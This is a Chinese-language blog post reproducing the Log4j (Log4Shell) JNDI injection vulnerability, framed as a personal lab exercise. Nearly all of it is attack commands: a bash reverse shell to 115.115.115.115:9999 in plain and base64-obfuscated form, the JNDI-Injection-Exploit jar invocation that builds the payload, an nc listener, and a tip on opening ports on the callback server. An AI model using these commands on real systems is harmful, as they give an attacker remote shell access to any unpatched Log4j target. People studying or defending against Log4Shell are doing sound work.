log4j复现及难点解决

卡了我好多天的难题终于解决了铁子们，太激动了。之前做这个实验用的是别人的服务器，没遇到过这个问题。这次自己买了个服务器，没想到却发生了反弹失败的情况。

log4j反弹地址一定要公网服务器，所以我买了一台公网服务器。

但是公网服务器的端口策略是没有开放的，导致监听端口没办法得到回应，最后失败。

请教大屌之后，才解决了这个难题，大屌yyds。接下来记录一下我的实验过程。

环境

一个log4j漏洞的网站

一台公网服务器（端口策略开放）
接下来的实验将以 115.115.115.115 代替这台倒霉服务器

实验步骤

需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload

工具地址：
https://github.com/bkfish/Apache-Log4j-Learning/tree/main/tools

使用如下网址来加密反弹shell命令

加密网址：
https://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell方法：
https://www.freebuf.com/articles/system/178150.html

bash -i >& /dev/tcp/115.115.115.115/9999 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTUuMTE1LjExNS4xMTUvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}

vps打开工具路径，输入命令：
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “要执行的命令” -A “你自己的公网服务器地址”

举例：

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTUuMTE1LjExNS4xMTUvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}” -A “115.115.115.115”

nc监听服务器地址

nc -lnvp 9999

将给出的红色payload打入目标站点


反弹shell成功

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！